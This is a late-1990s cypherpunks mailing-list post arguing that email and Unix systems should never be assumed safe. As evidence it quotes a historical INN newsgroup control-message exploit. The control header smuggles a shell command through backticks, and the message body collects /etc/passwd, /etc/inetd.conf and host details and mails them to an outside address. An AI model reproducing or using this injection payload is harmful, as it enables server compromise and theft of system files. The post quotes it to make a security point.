Toto wrote:
Bryce wrote:
The non-cpunks that I talk to frequently say that "no bad guys would bother to read my e-mail". as long as the value of reading your private e-mail is less than the cost of reading it, you can consider yourself safe.
Bad, bad assumption.
So my points are as follows:
2. To the cpunks: the _value_ of invading your privacy is not that high. There are no evil storm troopers whose full time job is to run a man-in-the-middle attack on your PGP public key, or dedicate a cracking farm to decrypting your messages, or using TEMPEST devices on your home computer or whatever. Therefore, simply encrypting your personal e-mail with a 512-bit PGP key, storing your private key on your local multi-user Unix system, and using people's public keys _without_ doing anti-Man-In-The-Middle techniques is more than sufficient to protect your privacy.
The main mistake in the argument that you cited is the following: it assumes that you know the cost of hacking and reading one's email or files. You do NOT know it. Moreover, while it is usually easy to find the upper bound for that cost, the lower bound is not so obvious. Recall the latest attack on INN servers, when one trivial message (see below) could be used to compromise thousands of internet sites, at the negligible cost. It is only safe to assume that the cost of breaking into a Unix system (or any other server for that matter) is ZERO. Unix security on multiuser machines is an oxymoron, it does not exist and should never be assumed. The problems with people actually securing their communications and personal data are as follows: 1) It is costly to set up a more or less secure system (ie, a system that is not a server and that is somewhat protected from various data attacks) because of learning curve and other costs 2) Many if not most correspondents are so clueless they's never even understand what they need to do to secure their communications. I had to drop several conversations with people because they were stupid/lazy enough not to set up PGP. - Igor. Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated From: tale@uunet.uu.net (David C Lawrence) Date: 1997/03/17 Message-Id: <5gkdv8$5uc@tabloid.amoco.com> Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated Organization: Amoco Newsgroups: comp.sys.mac.printing [Fewer Headers] #+ (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info tafeyereisen@amoco.com #-